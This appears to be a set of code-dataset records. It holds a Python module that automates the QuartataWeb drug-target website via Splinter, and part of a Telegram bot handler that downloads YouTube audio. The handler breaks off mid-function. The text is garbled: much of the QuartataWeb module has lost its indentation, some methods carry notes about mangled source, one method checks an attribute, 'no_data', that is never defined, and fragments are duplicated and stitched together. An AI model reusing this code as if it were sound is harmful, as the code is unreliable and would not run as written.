        LOGGER.info(str(len(self._listAll)-len(self._list)) + ' chemicals have been filtered out from '+str(len(self._listAll))+' QuartataWeb hits (remaining: '+str(len(self._list))+').')
        return self._list
def searchQuartataWeb(data_source=None, drug_group=None, input_type=None, query_type=None,
                      data=None, num_predictions=None, browser_type=None, job_id=None, result_type='Chemical'):
    """Wrapper function for searching QuartataWeb"""
    # Guard clause: only chemical records are implemented so far.
    if result_type != 'Chemical':
        LOGGER.warn('No other result types are supported yet')
        return None
    return QuartataChemicalRecord(data_source, drug_group, input_type, query_type,
                                  data, num_predictions, browser_type, job_id)


searchQuartataWeb.__doc__ += QuartataWebBrowser.__doc__
|
# -*- coding: utf-8 -*-
"""This module defines classes and functions for browsing QuartataWeb.
----------------------------------------------------------------------------------------
Based on code written by the CHARMM-GUI team (http://charmm-gui.org) and modified by <NAME>
This suite uses the following softwares:
a) python Splinter package (https://splinter.readthedocs.org/en/latest/)
b) a web browser, such as Google Chrome or Mozilla Firefox
c) the corresponding driver such as chromedriver (https://sites.google.com/a/chromium.org/chromedriver/downloads)
for Chrome or geckodriver (https://github.com/mozilla/geckodriver/releases) for Firefox
----------------------------------------------------------------------------------------
"""
from prody import PY3K, LOGGER
import numpy as np
__all__ = ['QuartataWebBrowser', 'QuartataChemicalRecord', 'searchQuartataWeb']
class QuartataWebBrowser(object):
"""Class to browse the QuartataWeb website."""
def __init__(self, data_source=None, drug_group=None, input_type=None, query_type=None,
data=None, num_predictions=None, browser_type=None, job_id=None):
"""Instantiate a QuartataWebBrowser object instance.
:arg data_source: source database for QuartataWeb analysis
options are ``"DrugBank"`` or ``"STITCH"``. Default is ``"DrugBank"``
:type data_source: str
:arg drug_group: group of drugs if using DrugBank
options are ``"Approved"`` or ``"All"``. Default is ``"All"``
:type drug_group: str
:arg input_type: number corresponding to the input type, options are
``1`` (Chemical and/or target) or
``2`` (A list of chemicals, targets or chemical combinations).
Default is ``1``
:type input_type: int
:arg query_type: number corresponding to the query type. Options are
dependent on input_type.
With input_type 1, they are:
* ``1`` (chemical-target interaction)
* ``2`` (chemical-chemical similarity)
* ``3`` (target-target similarity)
With input_type 2, they are:
* ``1`` (chemicals)
* ``2`` (targets)
* ``3`` (chemical combinations)
Default is ``1``
:type query_type: int
:arg data: data to enter into the box or boxes. This varies depending on input type
and query type, but will always be a list of strings.
For input_type 1, a list with two items is expected. These will be one of the
following depending on query_type:
* With query_type 1, the first would be a chemical and the second a target.
One of these can also be left blank.
* With query_type 2, the first would be a chemical and the second a chemical.
* With query_type 3, the first would be a target and the second a target.
For input_type 2, a list with any length is expected. These will be one of the
following depending on query_type:
* With query_type 1, these would be chemicals.
* With query_type 2, these would be targets.
* With query_type 3, these would be pairs of chemicals, separated by semicolons.
:type data: list
:arg num_predictions: number of predictions to show or consider in addition to
known interactions. Default is ``0``.
With DrugBank and input_type 1, a second number can be provided in a list
for secondary interactions.
:type num_predictions: int, list
:arg browser_type: browser type for navigation
Default is ``"Chrome"``
:type browser_type: str
:arg job_id: job ID for accessing previous jobs
Default is ``None``
:type browser_type: int
"""
self.browser_type = None
self.browser = None
self.data_source = None
self.drug_group = None
self.input_type = None
self.query_type = None
self.data = None
self.num_predictions = None
self.job_id = job_id
self.setBrowserType(browser_type)
self.setDataSource(data_source)
self.setDrugGroup(drug_group)
self.setInputType(input_type)
self.setQueryType(query_type)
self.setData(data)
self.setNumPredictions(num_predictions)
def updateHomePage(self):
"""Update the home page with data from setting variables"""
url = "http://quartata.csb.pitt.edu"
if self.data_source == 'DrugBank':
url += '/index'
else:
url += '/index_stitch'
if self.input_type == 2:
url += '_2'
url += '.php'
self.browser.visit(url)
if self.data_source == 'DrugBank':
if self.drug_group == 'Approved':
self.browser.find_by_name('db_type')[0].click()
else:
self.browser.find_by_name('db_type')[1].click()
if self.query_type is not None:
self.browser.find_by_name('pattern')[self.query_type - 1].click()
if self.data is not None:
if self.input_type == 1:
if self.query_type == 1:
self.browser.find_by_name('q_drug_1')[0].fill(self.data[0])
self.browser.find_by_name('q_target_1')[
0].fill(self.data[1])
elif self.query_type == 2:
self.browser.find_by_name('q_drug_1')[0].fill(self.data[0])
self.browser.find_by_name('q_drug_2')[0].fill(self.data[1])
else:
self.browser.find_by_name('q_target_1')[0].fill(self.data[0])
self.browser.find_by_name('q_target_2')[0].fill(self.data[1])
else:
if self.query_type == 1:
self.browser.find_by_name('q_drugs')[0].fill('\n'.join(self.data))
if self.query_type == 2:
self.browser.find_by_name('q_targets')[0].fill('\n'.join(self.data))
else:
self.browser.find_by_name('q_drug_pairs')[0].fill('\n'.join(self.data))
if self.num_predictions is not None:
self.browser.find_by_name('pred_n')[0].fill(self.num_predictions[0])
if self.data_source == 'DrugBank' and self.input_type == 1:
self.browser.find_by_name('pred_n_2nd')[0].fill(self.num_predictions[1])
def setDataSource(self, data_source):
"""Set data_source and update home page
:arg data_source: source database for QuartataWeb analysis
options are ``"DrugBank"`` or ``"STITCH"``. Default is ``"DrugBank"``
:type data_source: str
"""
if data_source is None:
data_source = 'DrugBank'
elif not isinstance(data_source, str):
raise TypeError('data_source should be a string or None')
elif data_source.lower() == 'drugbank':
data_source = 'DrugBank'
elif data_source.lower() == 'stitch':
data_source = 'STITCH'
else:
raise ValueError('data_source should be DrugBank, STITCH or None')
self.data_source = data_source
self.updateHomePage()
def setDrugGroup(self, group):
"""Set drug_group and update home page
:arg group: group of drugs if using DrugBank
options are ``"Approved"`` or ``"All"``. Default is ``"All"``
:type group: str
"""
if self.data_source == 'DrugBank':
if group is None:
group = 'All'
elif not isinstance(group, str):
raise TypeError('group must be string or None')
elif group.lower() == 'all':
group = 'All'
elif group.lower() == 'approved':
group = 'Approved'
else:
raise ValueError('group should be approved, all or None')
self.drug_group = group
self.updateHomePage()
elif group is not None:
LOGGER.warn('there are no groups when using STITCH')
def setInputType(self, input_type):
    """Choose the input type and refresh the home page.

    :arg input_type: number corresponding to the input type, options are
        ``1`` (Chemical and/or target) or
        ``2`` (A list of chemicals, targets or chemical combinations).
        Default is ``1``
    :type input_type: int
    """
    # early-exit guards replace the original if/elif chain
    if input_type is None:
        self.input_type = 1
        self.updateHomePage()
        return
    if not isinstance(input_type, int):
        raise TypeError('input_type should be an integer (1 or 2) or None')
    if input_type not in (1, 2):
        raise ValueError('input_type should be 1, 2 or None')
    self.input_type = input_type
    self.updateHomePage()
def setQueryType(self, query_type):
    """Choose the query type and refresh the home page.

    :arg query_type: number corresponding to the query type; its meaning
        depends on input_type (see the class documentation). With
        input_type 1: 1 chemical-target, 2 chemical-chemical,
        3 target-target. With input_type 2: 1 chemicals, 2 targets,
        3 chemical combinations. Default is ``1``
    :type query_type: int
    """
    # early-exit guards replace the original if/elif chain
    if query_type is None:
        self.query_type = 1
        self.updateHomePage()
        return
    if not isinstance(query_type, int):
        raise TypeError(
            'query_type should be an integer (1, 2 or 3) or None')
    if query_type not in (1, 2, 3):
        raise ValueError('query_type should be 1, 2, 3 or None')
    self.query_type = query_type
    self.updateHomePage()
def setData(self, data):
    """Set data and update home page.

    :arg data: entries for the query box(es); always a list of strings.
        With input_type 1 this is a 2-item list (a 1-item list is padded
        with a blank second entry). With input_type 2 it is a list of
        chemicals, targets or ';'-separated chemical pairs depending on
        query_type.
    :type data: list
    """
    if data is None:
        LOGGER.warn('data is not set')
    elif not isinstance(data, list):
        raise TypeError('data should be a list')
    else:
        for item in data:
            if not isinstance(item, str):
                raise TypeError('data should be a list of strings')
        if self.input_type == 1:
            if len(data) > 2:
                raise ValueError(
                    'data can only have two values with input_type 1')
            if len(data) == 1:
                # the second query box may be left blank
                data.append('')
        # BUGFIX: input_type is validated to be 1 or 2 elsewhere, so the
        # old `self.input_type == 3` branch could never run; chemical
        # pairs are entered with input_type 2 and query_type 3.
        if self.input_type == 2 and self.query_type == 3:
            for item in data:
                if item.find(';') == -1:
                    raise ValueError(
                        'each item in data must be a pair with ; as delimiter')
    self.data = data
    self.updateHomePage()
def setNumPredictions(self, num_predictions):
    """Set num_predictions and update home page.

    :arg num_predictions: number of predictions to show or consider in
        addition to known interactions (default ``0``). With DrugBank and
        input_type 1, a second number can be provided in a list for
        secondary interactions.
    :type num_predictions: int, list
    """
    if num_predictions is None:
        num_predictions = 0
    if not isinstance(num_predictions, (int, list)):
        raise TypeError(
            'num_predictions should be an integer, a list or None')
    if isinstance(num_predictions, int):
        num_predictions = [num_predictions, 0]
    # BUGFIX: a caller-supplied list shorter than 2 used to crash with
    # IndexError on the bounds checks below; pad with the 0 default.
    while len(num_predictions) < 2:
        num_predictions.append(0)
    if num_predictions[0] > 100:
        raise ValueError('1st num_predictions must be <= 100')
    if num_predictions[1] > 20:
        raise ValueError('2nd num_predictions must be <= 20')
    self.num_predictions = num_predictions
    self.updateHomePage()
def setBrowserType(self, browser_type):
    """Set browser_type, launch the browser and update home page.

    :arg browser_type: browser type for navigation
        Default is ``"Chrome"``
    :type browser_type: str
    """
    # NOTE(review): the indentation of this method was mangled in the
    # source; the reconstruction below nests the whole body under the
    # self.no_data guard so that Browser/WebDriverException are always in
    # scope where used — confirm against the upstream module.
    if self.no_data:
        # lazy third-party import so the module loads without splinter
        try:
            from splinter import Browser
        except ImportError:
            raise ImportError('Browser module could not be imported. '
                              'install splinter package to solve the problem.')
        else:
            from selenium.webdriver.common.service import WebDriverException
        if browser_type is None:
            # no preference: try Chrome first, then fall back to Firefox
            try:
                browser = Browser('chrome')
                url = "http://quartata.csb.pitt.edu"
                browser.visit(url)
            except WebDriverException:
                try:
                    browser = Browser('firefox')
                    url = "http://quartata.csb.pitt.edu"
                    browser.visit(url)
                except WebDriverException:
                    raise ValueError(
                        'No web driver found for Chrome or Firefox. Please specify a browser type or download an appropriate driver.')
                else:
                    self.browser_type = 'firefox'
            else:
                self.browser_type = 'chrome'
        elif not isinstance(browser_type, str):
            raise TypeError('browser_type should be a string or None')
        else:
            # explicit browser requested; fail hard if its driver is missing
            try:
                browser = Browser(browser_type)
                url = "http://quartata.csb.pitt.edu"
                browser.visit(url)
            except WebDriverException:
                raise ValueError(
                    'No web driver found for browser_type. Please specify a different browser type or download an appropriate driver.')
            else:
                self.browser_type = browser_type
        self.browser = browser
        self.updateHomePage()
def setJObID(self, job_id):
    """Set job_id and view results.

    :arg job_id: job ID for accessing previous jobs
        Default is ``None``
    :type job_id: int
    """
    self.job_id = job_id
    self.viewResults()
def viewResults(self):
    """View results by clicking submit or using a job_id."""
    # No job yet, or the browser is still on the query (index) page:
    # submit the form and harvest the new job id from the result URL.
    if self.job_id is None or self.browser.url.find('index') != -1:
        self.browser.find_by_name('submit')[0].click()
        # result URLs end in ..._id=<job id>
        self.job_id = self.browser.url.split('_')[-1].split('=')[-1]
    else:
        # Revisit an existing job's result page directly; STITCH results
        # live on a differently named PHP page.
        if self.data_source == 'DrugBank':
            url = '_'.join(['http://quartata.csb.pitt.edu/quartata_result.php?job',
                            'id={0}'.format(self.job_id)])
        else:
            url = '_'.join(['http://quartata.csb.pitt.edu/quartata_result',
                            'stitch.php?job', 'id={0}'.format(self.job_id)])
        self.browser.visit(url)
def goToDownloads(self):
    """Navigate the browser to the QuartataWeb downloads page for the job."""
    if self.job_id is None:
        # no job yet: submitting creates one and records its id
        self.viewResults()
    page = ('quartata_download.php' if self.data_source == 'DrugBank'
            else 'quartata_download_stitch.php')
    self.browser.visit(
        'http://quartata.csb.pitt.edu/{0}?job_id={1}'.format(page, self.job_id))
def goToWorkDir(self):
    """Navigate the browser to the job's working directory on the server."""
    if self.job_id is None:
        # no job yet: submitting creates one and records its id
        self.viewResults()
    self.browser.visit('http://quartata.csb.pitt.edu/work/' + str(self.job_id))
def parseChemicals(self):
    """Go to working directory and parse chemicals for query protein.

    Downloads the known-chemicals table for the query protein and
    populates self.fields, self.num_fields, self.num_rows and
    self.chemical_data (a numpy record array).

    :returns: ``True`` on success, ``False`` on any failure
    """
    try:
        self.goToWorkDir()
        if self.data_source == 'DrugBank':
            filename = 'known_drugs_for_query_protein.txt'
        else:
            filename = 'known_chemicals_for_query_protein.txt'
        self.browser.find_by_text(filename)[0].click()
        import requests
        html = requests.get(self.browser.url).content
        if PY3K:
            html = html.decode()
        lines = html.split('\n')
        # header row gives the column names
        self.fields = lines[0].split('\t')
        self.num_fields = len(self.fields)
        self.num_rows = len(lines[1:])
        if lines[-1].strip() == '':
            # ignore the trailing empty line of the file
            self.num_rows -= 1
        # infer a dtype per column from the first data row
        dtypes = []
        for i, item in enumerate(lines[1].split('\t')):
            if item.isnumeric():
                dtypes.append((self.fields[i], int))
            elif item.find('.') != -1 and item.replace('.', '0').isnumeric():
                dtypes.append((self.fields[i], float))
            else:
                dtypes.append((self.fields[i], object))
        self.chemical_data = np.empty(self.num_rows, dtype=dtypes)
        for i, line in enumerate(lines[1:self.num_rows+1]):
            items = line.split('\t')
            if len(items) != self.num_fields:
                raise ValueError('line {0} has the wrong number of fields'.format(i+1))
            for j, item in enumerate(items):
                self.chemical_data[i][j] = item
    # BUGFIX: was a bare `except:`, which also swallowed KeyboardInterrupt
    # and SystemExit; keep the deliberate best-effort False return but
    # only for ordinary exceptions.
    except Exception:
        success = False
    else:
        success = True
    return success
def quit(self):
    """Close the controlled web browser and end its session."""
    self.browser.quit()
class QuartataChemicalRecord(object):
    """Class for handling chemical data from QuartataWebBrowser.

    On construction it immediately fetches the chemical table for the
    given query (via QuartataWebBrowser) and exposes chemical/SMILES
    lists plus molecular-weight and confidence-score filtering.
    """

    def __init__(self, data_source=None, drug_group=None, input_type=None, query_type=None,
                 data=None, num_predictions=None, browser_type=None, job_id=None):
        """Instantiate a QuartataChemicalRecord object instance.
        Inputs are the same as QuartataWebBrowser.
        """
        self._chemData = None    # raw record array parsed from QuartataWeb (set by fetch)
        self._filterDict = None  # per-criterion lists of filtered-out chemicals (set by filter)
        self.data_source = data_source
        self.drug_group = drug_group
        self.input_type = input_type
        self.query_type = query_type
        self.data = data
        self.num_predictions = num_predictions
        self.browser_type = browser_type
        self.job_id = job_id
        # fetch immediately; isSuccess records whether parsing worked
        self.isSuccess = self.fetch(data_source, drug_group, input_type, query_type,
                                    data, num_predictions, browser_type, job_id)

    def fetch(self, data_source=None, drug_group=None, input_type=None, query_type=None,
              data=None, num_predictions=None, browser_type=None, job_id=None):
        """Fetch data.

        Any argument left as None falls back to the value stored at
        construction time. Returns True on success, False otherwise.
        """
        if data_source is None:
            data_source = self.data_source
        if drug_group is None:
            drug_group = self.drug_group
        if input_type is None:
            input_type = self.input_type
        if query_type is None:
            query_type = self.query_type
        if data is None:
            data = self.data
        if num_predictions is None:
            num_predictions = self.num_predictions
        if browser_type is None:
            browser_type = self.browser_type
        if job_id is None:
            job_id = self.job_id
        # drive the website through a fresh browser session, then close it
        self.qwb = QuartataWebBrowser(data_source, drug_group, input_type, query_type,
                                      data, num_predictions, browser_type, job_id)
        isSuccess = self.qwb.parseChemicals()
        self.qwb.quit()
        # NOTE(review): chemical_data is only assigned when parseChemicals
        # succeeds — on failure the attribute access below may raise;
        # confirm intended behavior.
        self._chemData = self.qwb.chemical_data
        # index the raw rows by chemical name for fast lookup
        chem_temp_dict = dict()
        listAll = []
        for temp in self._chemData:
            temp_dict = dict()
            chem_name = temp[1]
            temp_dict['DB_ID'] = temp[0]
            temp_dict['chemical_name'] = chem_name
            temp_dict['mol_weight'] = temp[2]
            temp_dict['SMILES'] = temp[3]
            temp_dict['conf_score'] = temp[4]
            chem_temp_dict[chem_name] = temp_dict
            listAll.append(chem_name)
        self._listAll = tuple(listAll)   # immutable full list of hits
        self._list = self._listAll       # current (possibly filtered) list
        self._chemDict = chem_temp_dict
        return isSuccess

    def getChemicalList(self, filtered=True):
        """Returns chemical list (filters may be applied)."""
        if not self.isSuccess:
            LOGGER.warn('Quartata Chemical Record does not have any data yet.'
                        'Please run fetch again, possibly with different parameters.')
        if filtered:
            return self._list
        return self._listAll

    def getSMILESList(self, filtered=True):
        """Returns SMILES list (filters may be applied)."""
        if not self.isSuccess:
            LOGGER.warn('Quartata Chemical Record does not have any data yet.'
                        'Please run fetch again, possibly with different parameters.')
        if filtered:
            return [self._chemDict[key]['SMILES'] for key in self._list]
        return self._chemData['SMILES']

    def getParticularSMILES(self, key):
        """Returns SMILES for a particular chemical (keyed by name)."""
        if not self.isSuccess:
            LOGGER.warn('Quartata Chemical Record does not have any data yet.'
                        'Please run fetch again, possibly with different parameters.')
        return self._chemDict[key]['SMILES']

    def getFilterList(self):
        """Returns a list of chemicals for the entries that were filtered out."""
        filterDict = self._filterDict
        if filterDict is None:
            raise ValueError('You cannot obtain the list of filtered out entries before doing any filtering.')
        # report how many entries each criterion removed
        temp_str = ', '.join([str(len(filterDict['lower_MW'])), str(len(filterDict['upper_MW'])),
                              str(len(filterDict['conf_score']))])
        LOGGER.info('Filtered out [' + temp_str + '] for [lower weight, upper weight, confidence score]')
        return self._filterList

    def filter(self, lower_weight=None, upper_weight=None, cutoff_score=None):
        """Filters out chemicals from the list and returns the updated list.
        Chemicals that satisfy any of the following criterion will be filtered out.
        (1) Molecular weight < lower_weight (must be a positive number);
        (2) Molecular weight > upper_weight (must be a positive number);
        (3) Confidence score < cutoff_score (must be a positive number);
        Please note that every time this function is run, this overrides any previous runs.
        Therefore, please provide all filters at once.
        """
        if not self.isSuccess:
            LOGGER.warn('Quartata Chemical Record does not have any data yet.'
                        'Please run fetch again, possibly with different parameters.')
            return None
        # each threshold defaults to 0, which disables that criterion
        if lower_weight == None:
            lower_weight = 0
        elif not isinstance(lower_weight, (float, int)):
            raise TypeError('lower_weight must be a float or an integer')
        if lower_weight >= 0:
            lower_weight = float(lower_weight)
        else:
            raise ValueError('lower_weight must be a number not less than 0')
        if upper_weight == None:
            upper_weight = 0
        elif not isinstance(upper_weight, (float, int)):
            raise TypeError('upper_weight must be a float or an integer')
        if upper_weight >= 0:
            upper_weight = float(upper_weight)
        else:
            raise ValueError('upper_weight must be a number not less than 0')
        if cutoff_score == None:
            cutoff_score = 0
        elif not isinstance(cutoff_score, (float, int)):
            raise TypeError('cutoff_score must be a float or an integer')
        elif cutoff_score >= 0:
            cutoff_score = float(cutoff_score)
        else:
            raise ValueError('cutoff_score must be a number not less than 0')
        quartataInfo = self._chemDict
        if quartataInfo is None:
            raise ValueError("Quartata Chemical Record does not have any data yet. Please run fetch.")
        listAll = self._listAll
        ref_indices_set = set(range(self.qwb.num_rows))  # NOTE(review): unused
        filterListLowerMW = []
        filterListUpperMW = []
        filterListConf = []
        # first matching criterion wins; an entry appears in one list only
        for chem in listAll:
            temp_dict = quartataInfo[chem]
            if temp_dict['mol_weight'] < lower_weight:
                filterListLowerMW.append(chem)
                continue
            if upper_weight > 0 and temp_dict['mol_weight'] > upper_weight:
                filterListUpperMW.append(chem)
                continue
            if temp_dict['conf_score'] < cutoff_score:
                filterListConf.append(chem)
                continue
        filterList = filterListLowerMW + filterListUpperMW + filterListConf
        filterDict = {'lower_MW': filterListLowerMW, 'upper_MW': filterListUpperMW, 'conf_score': filterListConf}
        self._filterList = filterList
        self._filterDict = filterDict
        self._list = list(set(self._listAll) - set(filterList))
        LOGGER.info(str(len(self._listAll)-len(self._list)) + ' chemicals have been filtered out from '+str(len(self._listAll))+' QuartataWeb hits (remaining: '+str(len(self._list))+').')
        return self._list
def searchQuartataWeb(data_source=None, drug_group=None, input_type=None, query_type=None,
                      data=None, num_predictions=None, browser_type=None, job_id=None, result_type='Chemical'):
    """Wrapper function for searching QuartataWeb."""
    # guard clause: only chemical records are implemented so far
    if result_type != 'Chemical':
        LOGGER.warn('No other result types are supported yet')
        return None
    return QuartataChemicalRecord(data_source, drug_group, input_type, query_type,
                                  data, num_predictions, browser_type, job_id)
searchQuartataWeb.__doc__ += QuartataWebBrowser.__doc__
|
en
| 0.765276
|
# -*- coding: utf-8 -*- This module defines classes and functions for browsing QuartataWeb. ---------------------------------------------------------------------------------------- Based on code written by the CHARMM-GUI team (http://charmm-gui.org) and modified by <NAME> This suite uses the following softwares: a) python Splinter package (https://splinter.readthedocs.org/en/latest/) b) a web browser, such as Google Chrome or Mozilla Firefox c) the corresponding driver such as chromedriver (https://sites.google.com/a/chromium.org/chromedriver/downloads) for Chrome or geckodriver (https://github.com/mozilla/geckodriver/releases) for Firefox ---------------------------------------------------------------------------------------- Class to browse the QuartataWeb website. Instantiate a QuartataWebBrowser object instance. :arg data_source: source database for QuartataWeb analysis options are ``"DrugBank"`` or ``"STITCH"``. Default is ``"DrugBank"`` :type data_source: str :arg drug_group: group of drugs if using DrugBank options are ``"Approved"`` or ``"All"``. Default is ``"All"`` :type drug_group: str :arg input_type: number corresponding to the input type, options are ``1`` (Chemical and/or target) or ``2`` (A list of chemicals, targets or chemical combinations). Default is ``1`` :type input_type: int :arg query_type: number corresponding to the query type. Options are dependent on input_type. With input_type 1, they are: * ``1`` (chemical-target interaction) * ``2`` (chemical-chemical similarity) * ``3`` (target-target similarity) With input_type 2, they are: * ``1`` (chemicals) * ``2`` (targets) * ``3`` (chemical combinations) Default is ``1`` :type query_type: int :arg data: data to enter into the box or boxes. This varies depending on input type and query type, but will always be a list of strings. For input_type 1, a list with two items is expected. 
These will be one of the following depending on query_type: * With query_type 1, the first would be a chemical and the second a target. One of these can also be left blank. * With query_type 2, the first would be a chemical and the second a chemical. * With query_type 3, the first would be a target and the second a target. For input_type 2, a list with any length is expected. These will be one of the following depending on query_type: * With query_type 1, these would be chemicals. * With query_type 2, these would be targets. * With query_type 3, these would be pairs of chemicals, separated by semicolons. :type data: list :arg num_predictions: number of predictions to show or consider in addition to known interactions. Default is ``0``. With DrugBank and input_type 1, a second number can be provided in a list for secondary interactions. :type num_predictions: int, list :arg browser_type: browser type for navigation Default is ``"Chrome"`` :type browser_type: str :arg job_id: job ID for accessing previous jobs Default is ``None`` :type browser_type: int Update the home page with data from setting variables Set data_source and update home page :arg data_source: source database for QuartataWeb analysis options are ``"DrugBank"`` or ``"STITCH"``. Default is ``"DrugBank"`` :type data_source: str Set drug_group and update home page :arg group: group of drugs if using DrugBank options are ``"Approved"`` or ``"All"``. Default is ``"All"`` :type group: str Set input_type and update home page :arg input_type: number corresponding to the input type, options are ``1`` (Chemical and/or target) or ``2`` (A list of chemicals, targets or chemical combinations). Default is ``1`` :type input_type: int Set query_type and update home page :arg query_type: number corresponding to the query type. Options are dependent on input_type. 
With input_type 1, they are: * ``1`` (chemical-target interaction) * ``2`` (chemical-chemical similarity) * ``3`` (target-target similarity) With input_type 2, they are: * ``1`` (chemicals) * ``2`` (targets) * ``3`` (chemical combinations) Default is ``1`` :type query_type: int Set data and update home page :arg data: data to enter into the box or boxes. This varies depending on input type and query type, but will always be a list of strings. For input_type 1, a list with two items is expected. These will be one of the following depending on query_type: * With query_type 1, the first would be a chemical and the second a target. One of these can also be left blank. * With query_type 2, the first would be a chemical and the second a chemical. * With query_type 3, the first would be a target and the second a target. For input_type 2, a list with any length is expected. These will be one of the following depending on query_type: * With query_type 1, these would be chemicals. * With query_type 2, these would be targets. * With query_type 3, these would be pairs of chemicals, separated by semicolons. :type data: list Set num_predictions and update home page :arg num_predictions: number of predictions to show or consider in addition to known interactions. Default is ``0``. With DrugBank and input_type 1, a second number can be provided in a list for secondary interactions. :type num_predictions: int, list Set browser_type and update home page :arg browser_type: browser type for navigation Default is ``"Chrome"`` :type browser_type: str Set job_id and view results :arg job_id: job ID for accessing previous jobs Default is ``None`` :type browser_type: int View results by clicking submit or using a job_id Go to downloads page Go to working directory Go to working directory and parse chemicals for query protein. Updates self.chemical_data Class for handling chemical data from QuartataWebBrowser Instantiate a QuartataChemicalRecord object instance. 
Inputs are the same as QuartataWebBrowser. Fetch data Returns chemical list (filters may be applied) Returns SMILES list (filters may be applied) Returns SMILES for a particular chemical Returns a list of chemicals for the entries that were filtered out Filters out chemicals from the list and returns the updated list. Chemicals that satisfy any of the following criterion will be filtered out. (1) Molecular weight < lower_weight (must be a positive number); (2) Molecular weight > upper_weight (must be a positive number); (3) Confidence score < cutoff_score (must be a positive number); Please note that every time this function is run, this overrides any previous runs. Therefore, please provide all filters at once. Wrapper function for searching QuartataWeb
| 2.555782
| 3
|
handlers/song.py
|
ajmalyaseen/Nx-Music-DL
| 0
|
6628085
|
from __future__ import unicode_literals
import os
import requests
import aiohttp
import youtube_dl
import wget
import math
from pyrogram import filters, Client
from youtube_search import YoutubeSearch
from Python_ARQ import ARQ
from urllib.parse import urlparse
import aiofiles
import os
from random import randint
from youtubesearchpython import SearchVideos
from pyrogram.errors import FloodWait, MessageNotModified
from pyrogram.types import Chat, Message, User
import asyncio
from typing import Callable, Coroutine, Dict, List, Tuple, Union
import sys
import time
from helpers.errors import DurationLimitError
@Client.on_message(filters.command('song') & ~filters.channel)
def song(client, message):
    """Handle /song: search YouTube for the query text, download the best
    m4a audio stream with youtube_dl and reply with it as an audio message.
    Temporary audio/thumbnail files are removed best-effort afterwards."""
    # rebuild the query from the command arguments
    query = ''
    for i in message.command[1:]:
        query += ' ' + str(i)
    print(query)
    m = message.reply('🔎 Finding the song...\n\n@CoderzHex')
    ydl_opts = {"format": "bestaudio[ext=m4a]"}
    try:
        results = YoutubeSearch(query, max_results=1).to_dict()
        link = f"https://youtube.com{results[0]['url_suffix']}"
        title = results[0]["title"][:40]
        thumbnail = results[0]["thumbnails"][0]
        thumb_name = f'thumb{title}.jpg'
        thumb = requests.get(thumbnail, allow_redirects=True)
        # BUGFIX: use a context manager so the thumbnail file handle is
        # closed (was: open(...).write(...), which leaked the handle)
        with open(thumb_name, 'wb') as thumb_file:
            thumb_file.write(thumb.content)
        duration = results[0]["duration"]
    except Exception as e:
        m.edit(
            "❌ Found Nothing.\nCheck Your Name or spelling"
        )
        print(str(e))
        return
    m.edit("**📥 Downloading the song**\n\n@CoderzHex")
    try:
        with youtube_dl.YoutubeDL(ydl_opts) as ydl:
            info_dict = ydl.extract_info(link, download=False)
            audio_file = ydl.prepare_filename(info_dict)
            ydl.process_info(info_dict)
        rep = '**🎧 Uploaded by @CoderzHEX **'
        # convert the "h:m:s"-style duration string into total seconds
        secmul, dur, dur_arr = 1, 0, duration.split(':')
        for i in range(len(dur_arr)-1, -1, -1):
            dur += (int(dur_arr[i]) * secmul)
            secmul *= 60
        message.reply_audio(audio_file, caption=rep, thumb=thumb_name, parse_mode='md', title=title, duration=dur)
        m.delete()
    except Exception as e:
        m.edit('❌ Error')
        print(e)
    # best-effort cleanup; files may be absent if an earlier step failed
    try:
        os.remove(audio_file)
        os.remove(thumb_name)
    except Exception as e:
        print(e)
def get_text(message: "Message") -> Union[str, None]:
    """Return the argument portion of a command message, or None.

    Gives back everything after the first whitespace run in
    ``message.text``; None when the message has no text or no argument.
    """
    # BUGFIX: the return annotation was the list literal [None, str],
    # which is not a valid type expression; Union[str, None] states the
    # actual contract (the Message annotation is quoted so the function
    # also compiles without pyrogram installed).
    if message.text is None:
        return None
    if " " not in message.text:
        return None
    try:
        return message.text.split(None, 1)[1]
    except IndexError:
        return None
def humanbytes(size):
    """Convert a byte count into a human-readable string such as '2.0 KiB'.

    Returns "" for a falsy size (0 or None).
    """
    if not size:
        return ""
    power = 2 ** 10
    raised_to_pow = 0
    dict_power_n = {0: "", 1: "Ki", 2: "Mi", 3: "Gi", 4: "Ti"}
    # BUGFIX: use >= so exact powers (e.g. 1024) report as "1.0 KiB"
    # rather than "1024 B", and cap the exponent at TiB so huge sizes
    # no longer raise KeyError on the suffix lookup.
    while size >= power and raised_to_pow < 4:
        size /= power
        raised_to_pow += 1
    return str(round(size, 2)) + " " + dict_power_n[raised_to_pow] + "B"
async def progress(current, total, message, start, type_of_ps, file_name=None):
    """Pyrogram transfer callback: edit *message* with a progress bar.

    Updates are throttled to roughly every 10 elapsed seconds, plus one
    final update at completion. FloodWait is absorbed by sleeping;
    MessageNotModified is ignored.
    """
    now = time.time()
    diff = now - start
    # BUGFIX: guard against ZeroDivisionError when the callback fires
    # within the same clock tick as `start`
    if diff <= 0:
        return
    if round(diff % 10.00) == 0 or current == total:
        percentage = current * 100 / total
        speed = current / diff
        elapsed_time = round(diff) * 1000
        if elapsed_time == 0:
            return
        time_to_completion = round((total - current) / speed) * 1000
        estimated_total_time = elapsed_time + time_to_completion
        # ten-segment bar: filled blocks for done, light blocks for remaining
        progress_str = "{0}{1} {2}%\n".format(
            "".join(["█" for i in range(math.floor(percentage / 10))]),
            "".join(["░" for i in range(10 - math.floor(percentage / 10))]),
            round(percentage, 2),
        )
        tmp = progress_str + "{0} of {1}\nETA: {2}".format(
            humanbytes(current), humanbytes(total), time_formatter(estimated_total_time)
        )
        if file_name:
            try:
                await message.edit(
                    "{}\n**File Name:** `{}`\n{}".format(type_of_ps, file_name, tmp)
                )
            except FloodWait as e:
                # Telegram rate limit: wait it out and drop this update
                await asyncio.sleep(e.x)
            except MessageNotModified:
                pass
        else:
            try:
                await message.edit("{}\n{}".format(type_of_ps, tmp))
            except FloodWait as e:
                await asyncio.sleep(e.x)
            except MessageNotModified:
                pass
def get_user(message: Message, text: str) -> [int, str, None]:
    """Resolve the target user and optional reason for a moderation command.

    Prefers the replied-to message's author; otherwise parses *text* as
    "<user> [reason]". Returns a (user, reason) pair where user is an int
    id when the token is numeric, else a username string; either element
    may be None.
    """
    if text is None:
        asplit = None
    else:
        # split into at most [user_token, rest-of-text]
        asplit = text.split(" ", 1)
    user_s = None
    reason_ = None
    if message.reply_to_message:
        # reply form: target is the replied message's author, whole text is the reason
        user_s = message.reply_to_message.from_user.id
        reason_ = text if text else None
    elif asplit is None:
        return None, None
    elif len(asplit[0]) > 0:
        user_s = int(asplit[0]) if asplit[0].isdigit() else asplit[0]
        # NOTE(review): source indentation was mangled; this nests the
        # reason assignment under the text-parsing branch — confirm.
        if len(asplit) == 2:
